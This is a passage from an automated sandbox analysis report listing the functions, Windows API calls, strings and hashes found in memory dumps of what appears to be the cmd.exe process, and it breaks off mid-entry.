                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • GetDiskFreeSpaceExW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,-00000105,?,?,?), ref: 00B2A83C
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?), ref: 00B2A8B5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: memset$DiskFreeSpace
                                                                            • String ID: %5lu
                                                                            • API String ID: 2448137811-2100233843
                                                                            • Opcode ID: 4cf12d175c9e9428798da446e5efaee4205af203b994020c4e11b60b49592776
                                                                            • Instruction ID: 146fc36617fb169323a4d1e6bff5bf1356fdfc43d4001188d42227a0a9672e5d
                                                                            • Opcode Fuzzy Hash: 4cf12d175c9e9428798da446e5efaee4205af203b994020c4e11b60b49592776
                                                                            • Instruction Fuzzy Hash: C5418671A00229ABDB14DBA4ECD5AEEBBF4EF08304F0444E9E509A7181EB749F85CB51
                                                                            Function 00B2378A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 111COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0(001F0003,00000000,?), ref: 00B23835
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B23847
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastOpenSemaphore
                                                                            • String ID: _p0$wil
                                                                            • API String ID: 1909229842-1814513734
                                                                            • Opcode ID: a971874e55001c4d3be00c282b26ee1fb3fe56211919f8349d65f8a99196d2ff
                                                                            • Instruction ID: 3ac3360964e1e65d6f106c33f14399b9292ca802d6024670213a1062ba774e87
                                                                            • Opcode Fuzzy Hash: a971874e55001c4d3be00c282b26ee1fb3fe56211919f8349d65f8a99196d2ff
                                                                            • Instruction Fuzzy Hash: 6D41C3B1A412398BCB25DF28D8985A977F5EB94B00F1482E9E809DF254DB74CF458B90
                                                                            Function 00B2237E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 110synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000040), ref: 00B2239F
                                                                            • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,?,00000000,001F0001), ref: 00B223CD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: CreateCurrentMutexProcess
                                                                            • String ID: Local\SM0:%d:%d:%hs$wil
                                                                            • API String ID: 3937467467-2303653343
                                                                            • Opcode ID: f45af854eefec278df340ebfeac3dab5f1a4c11b2c8b26583db0b40f798e8857
                                                                            • Instruction ID: 54e24761b04f53b25f23ee8abdfbf906a10c2d680fe1f17db2fc2c297add38dd
                                                                            • Opcode Fuzzy Hash: f45af854eefec278df340ebfeac3dab5f1a4c11b2c8b26583db0b40f798e8857
                                                                            • Instruction Fuzzy Hash: 0441B376A40238ABCB21EB54EC89AEA77F5EF94700F1041C5E91DAB341DB709F458F91
                                                                            Function 00B2B222 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B2B25E
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • _wcslwr.MSVCRT ref: 00B2B2D2
                                                                            • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000001,?,?,?), ref: 00B2B30B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: memset$_wcslwr
                                                                            • String ID: [%s]
                                                                            • API String ID: 886762496-302437576
                                                                            • Opcode ID: 7eabc308c5f1bbf0b7ad3f1343a1bbc8ad056a9871183d8822916c4a9d3ac861
                                                                            • Instruction ID: be48cdc2f9825967c8daff74acd26bbedf4fab6566adea96c5b563f2515ffa12
                                                                            • Opcode Fuzzy Hash: 7eabc308c5f1bbf0b7ad3f1343a1bbc8ad056a9871183d8822916c4a9d3ac861
                                                                            • Instruction Fuzzy Hash: 57318471A002299BDB14DBA9E885BEEBBF8EB18310F0400E9A509E7181DF74DE448B50
                                                                            Function 00B14BAF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsnicmp
                                                                            • String ID: /-Y$COPYCMD
                                                                            • API String ID: 1886669725-617350906
                                                                            • Opcode ID: dd2b30959a18be3d8d560950b34761d17a331d70ac367f66e7855a362e1756c4
                                                                            • Instruction ID: 07cb04db7e2595cc4e40fa891d242298d696027aaffff607f133145f774f6adb
                                                                            • Opcode Fuzzy Hash: dd2b30959a18be3d8d560950b34761d17a331d70ac367f66e7855a362e1756c4
                                                                            • Instruction Fuzzy Hash: C6215E75A04221ABCF289B199C897FBB6E5EF89358B9100E5E849E7340EB70CE81C350
                                                                            Function 00B09E09 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00B09E8E: iswspace.MSVCRT ref: 00B09E9E
                                                                            • iswspace.MSVCRT ref: 00B09E28
                                                                            • _wcsnicmp.MSVCRT ref: 00B09E79
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: iswspace$_wcsnicmp
                                                                            • String ID: off
                                                                            • API String ID: 3989682491-733764931
                                                                            • Opcode ID: cabad05293ca8bee3b97b3c6d7153e767b1d229e4f0f7f5f9a8e35503a755482
                                                                            • Instruction ID: d5c530a00754a7fee55264daa42d01ba20d1ff5d44bb10643f86354de7562764
                                                                            • Opcode Fuzzy Hash: cabad05293ca8bee3b97b3c6d7153e767b1d229e4f0f7f5f9a8e35503a755482
                                                                            • Instruction Fuzzy Hash: A31148266043119ADA28A269EC5AB3B5ED4DB81B51B2400EDF90AD30C3EE018E4980A1
                                                                            Function 00B25166 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00B1727B: __iob_func.MSVCRT ref: 00B17280
                                                                            • fprintf.MSVCRT ref: 00B25182
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: __iob_funcfprintf
                                                                            • String ID: CMD Internal Error %s$%s$Null environment
                                                                            • API String ID: 620453056-2781220306
                                                                            • Opcode ID: 692a753345d7d9886d9afff0e3d59e2ae0cf82e7cb68e62cbf57b91504054bf5
                                                                            • Instruction ID: af96613393b9b80d49a44139e18fecc0ae3181dc93b3caea8aa8f8ed3dbc6960
                                                                            • Opcode Fuzzy Hash: 692a753345d7d9886d9afff0e3d59e2ae0cf82e7cb68e62cbf57b91504054bf5
                                                                            • Instruction Fuzzy Hash: D3017B37A44A225AC7342B58B84AAA373D4EAE071632505ABEC5EB3180F9709E52C540
                                                                            Function 00B23500 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll.dll), ref: 00B2351B
                                                                            • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RtlDllShutdownInProgress), ref: 00B2352C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: RtlDllShutdownInProgress$ntdll.dll
                                                                            • API String ID: 1646373207-582119455
                                                                            • Opcode ID: 58eb3228ed4e371825fee52e4778b9c1ff744f3197a9506852260fe39d87fe68
                                                                            • Instruction ID: 6a65188bdfb352f824fe7162b186d3875e5abc6a336f821bfb86dd6106aad9b9
                                                                            • Opcode Fuzzy Hash: 58eb3228ed4e371825fee52e4778b9c1ff744f3197a9506852260fe39d87fe68
                                                                            • Instruction Fuzzy Hash: 37E01235A512309B8B715F35BD0959E3BE8FB56F6030501D5E90DE3360DE648E018FD1
                                                                            Function 00B238F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(kernelbase.dll), ref: 00B238FB
                                                                            • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RaiseFailFastException), ref: 00B23907
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: RaiseFailFastException$kernelbase.dll
                                                                            • API String ID: 1646373207-919018592
                                                                            • Opcode ID: e9b0ba8f60ded5ba0e2a70409a6f113d104cdc18e15e1fab3952387d2b827d96
                                                                            • Instruction ID: 51c45284f5260da60131eaf782d485ccc788a741e6cd1ebff65bd17a577f6711
                                                                            • Opcode Fuzzy Hash: e9b0ba8f60ded5ba0e2a70409a6f113d104cdc18e15e1fab3952387d2b827d96
                                                                            • Instruction Fuzzy Hash: 27E0E67654072577CB111F96DC0DC4E7F99EB46BA17014051F909931608E75CE10DB91
                                                                            Function 00B152F5 Relevance: 6.2, APIs: 4, Instructions: 185COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B1539E
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,00007FE9), ref: 00B154C6
                                                                              • Part of subcall function 00B08E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00B48BF0,00000000,?), ref: 00B08EC3
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: memset$CurrentDirectory
                                                                            • String ID:
                                                                            • API String ID: 168429351-0
                                                                            • Opcode ID: 79de85c2826f567a6f8c0f62f3f090bc496faab7483ed8fa7bc5228c2cb6a58e
                                                                            • Instruction ID: cc8eea1dcd08287e63a0165f9750857664fa87f4428562256bfcd495de9a9e32
                                                                            • Opcode Fuzzy Hash: 79de85c2826f567a6f8c0f62f3f090bc496faab7483ed8fa7bc5228c2cb6a58e
                                                                            • Instruction Fuzzy Hash: 5F614571A087419FD328CF28E4856ABBBE5FBC8300F50496EF599C7350EB309984CB96
                                                                            Function 00B0AA75 Relevance: 6.2, APIs: 4, Instructions: 182COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsnicmp$wcschr
                                                                            • String ID:
                                                                            • API String ID: 3270668897-0
                                                                            • Opcode ID: 9bc27977f18fb586099a15aef4d888c7eb618ea82b23834a7d00356f6315c160
                                                                            • Instruction ID: 2788908416501f37c121bdebb142de87f6ce886be58b76811a6696f90b6e1cb1
                                                                            • Opcode Fuzzy Hash: 9bc27977f18fb586099a15aef4d888c7eb618ea82b23834a7d00356f6315c160
                                                                            • Instruction Fuzzy Hash: E8519E367403149BC725EF689851ABD7BE5EF84700BA444EDE843972C5EB704EC2C382
                                                                            Function 00B0DED0 Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: iswdigit
                                                                            • String ID:
                                                                            • API String ID: 3849470556-0
                                                                            • Opcode ID: ecbb9e373ef50bb22c6ba3653dca66143a5b568ad734a41676e58e5865606566
                                                                            • Instruction ID: b8e26c2603404c078396bc12a28dd901809cb4516d1411d322653307893a9ad3
                                                                            • Opcode Fuzzy Hash: ecbb9e373ef50bb22c6ba3653dca66143a5b568ad734a41676e58e5865606566
                                                                            • Instruction Fuzzy Hash: 7751C274A042059BDB14DF99D88527DBBF1FB80300F2585EAE912873D0EBB5DE51DB81
                                                                            Function 00B11CD5 Relevance: 6.1, APIs: 4, Instructions: 118COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,00B080F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00B11D3A
                                                                            • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00B080F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00B11D44
                                                                            • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,00B080F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00B11D57
                                                                            • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00B080F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00B11D61
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$FullNamePath
                                                                            • String ID:
                                                                            • API String ID: 268959451-0
                                                                            • Opcode ID: 2cbcffff40a8c0cfa9a68d63c23d2ffd0c17115880ddf3c2d7bd20a6f37e0ee1
                                                                            • Instruction ID: e9e6f705ad22d01ea89bb7bbcc0f58e937b6b565657313a965220e89c44499d6
                                                                            • Opcode Fuzzy Hash: 2cbcffff40a8c0cfa9a68d63c23d2ffd0c17115880ddf3c2d7bd20a6f37e0ee1
                                                                            • Instruction Fuzzy Hash: 5C31FB79100101ABCB28DFA8C8559FBB7E5EF483047A589ADEA47C7650E7B1AE81C750
                                                                            Function 00B0C570 Relevance: 6.1, APIs: 4, Instructions: 101memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00B0C5BD
                                                                            • RtlFreeHeap.NTDLL ref: 00B0C5C4
                                                                            • _setjmp3.MSVCRT ref: 00B0C630
                                                                            • VirtualFree.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,00008000,00000000,00000000,00000000,00000000,00000000), ref: 00B0C69D
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: FreeHeap$ProcessVirtual_setjmp3
                                                                            • String ID:
                                                                            • API String ID: 2613391085-0
                                                                            • Opcode ID: 0253f043e933d99065dbaf5fceb8d78d8e70e0beaca826215761685755b8d2f2
                                                                            • Instruction ID: 5f9b5d94ebac7872674aae3c211a4a3529cd586ba0b89077c6df55230f58246b
                                                                            • Opcode Fuzzy Hash: 0253f043e933d99065dbaf5fceb8d78d8e70e0beaca826215761685755b8d2f2
                                                                            • Instruction Fuzzy Hash: 5B319075A00214ABEB24DF68EC4576D7FF4FB65704F2182B9D809D72A0EF719C448B91
                                                                            Function 00B263F3 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • longjmp.MSVCRT(00B40A30,00000001,?,?,00B1BFD6,?,?,?,?,?,?,?,?), ref: 00B264D4
                                                                              • Part of subcall function 00B0DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000), ref: 00B0DCE1
                                                                              • Part of subcall function 00B0DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000,00000000), ref: 00B0DCE8
                                                                              • Part of subcall function 00B172EF: ApiSetQueryApiSetPresence.API-MS-WIN-CORE-APIQUERY-L1-1-0(00B01028,?,?,?,00B1F12E,00B2CA50,00000018,00B11E7C,00000000,00000000,00B1ACE0,00000000,00000000,?,00000104,?), ref: 00B17314
                                                                            • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,00000000,000000FF,00000000,00000000,?,?,00B1BFD6), ref: 00B2646C
                                                                            • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,00000000,000000FF,00000000,00000000,?,?,00B1BFD6), ref: 00B26474
                                                                            • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,00000000,000000FF,00000000,00000000,?,?,00B1BFD6), ref: 00B264B6
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorHeapMode$AllocByteCharMultiPresenceProcessQueryWidelongjmp
                                                                            • String ID:
                                                                            • API String ID: 129137517-0
                                                                            • Opcode ID: f3040bc46369ccca28813c948bc0ba605bad0ee9e5ae72f4dab005b7a9b843bd
                                                                            • Instruction ID: de5e4de2eb546ea6a29bf4356a166cb3c03b7161bc68c071f128dd0ab7fc911e
                                                                            • Opcode Fuzzy Hash: f3040bc46369ccca28813c948bc0ba605bad0ee9e5ae72f4dab005b7a9b843bd
                                                                            • Instruction Fuzzy Hash: B6215B366002116BDB24BFB89C55C7F3BEADFC131470846A8F90A873C1EE758E05C2A0
                                                                            Function 00B262B3 Relevance: 6.1, APIs: 4, Instructions: 81registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000001,?,00B2CD20,0000001C,00B258DF), ref: 00B262E6
                                                                            • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?,00B2CD20,0000001C,00B258DF), ref: 00B26301
                                                                            • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?), ref: 00B26340
                                                                            • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00B2635D
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: QueryValue$ErrorLastOpen
                                                                            • String ID:
                                                                            • API String ID: 4270309053-0
                                                                            • Opcode ID: 0e561c05b93a625f1c71ddb1c19263432cce3bdf8e3e165ae8e6e5e2a21ec9ff
                                                                            • Instruction ID: 3dffc5d2974e6fa16956981a77b6df6600e3519d70cc714dc84f569e3c0a6c8e
                                                                            • Opcode Fuzzy Hash: 0e561c05b93a625f1c71ddb1c19263432cce3bdf8e3e165ae8e6e5e2a21ec9ff
